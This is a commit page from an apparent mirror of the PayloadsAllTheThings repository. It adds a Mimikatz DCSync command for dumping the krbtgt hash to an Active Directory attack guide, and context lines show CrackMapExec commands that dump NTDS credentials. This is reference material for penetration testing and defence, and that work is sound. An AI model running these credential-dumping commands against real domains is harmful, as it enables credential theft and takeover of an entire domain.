ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 19:06:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

RODC dcsync note + Dumping AD Domain summary

Browse Source
This commit is contained in:
Swissky 2019-10-18 00:07:09 +02:00
parent 8eae039a28
commit 7159a3ded3
2 changed files with 18 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
Methodology and Resources/Active Directory Attack.md
View File

@ -8,6 +8,11 @@
* [Open Shares](#open-shares)
* [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
* [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
* Using ndtsutil
* Using Vshadow
* Using vssadmin
* Using DiskShadow
* Using Mimikatz DCSync
* [Password in AD User comment](#password-in-ad-user-comment)
* [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets)
* [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
@ -378,6 +383,17 @@ cme smb 10.10.0.202 -u username -p password --ntds vss
cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default
```
#### Using Mimikatz DCSync
Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data.
```powershell
mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt
```
:warning: Read-Only Domain Controllers are not allowed to pull password data for users by default.
### Password in AD User comment
```powershell
@ -989,3 +1005,4 @@ PXE allows a workstation to boot from the network by retrieving an operating sys
* [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/)
* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/)
* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592)

1
Server Side Request Forgery/README.md
View File

@ -52,6 +52,7 @@
- [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap)
- [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus)
- [See-SURF - https://github.com/In3tinct/See-SURF](https://github.com/In3tinct/See-SURF)
- [SSRF Sheriff - https://github.com/teknogeek/ssrf-sheriff](https://github.com/teknogeek/ssrf-sheriff)
## Payloads with localhost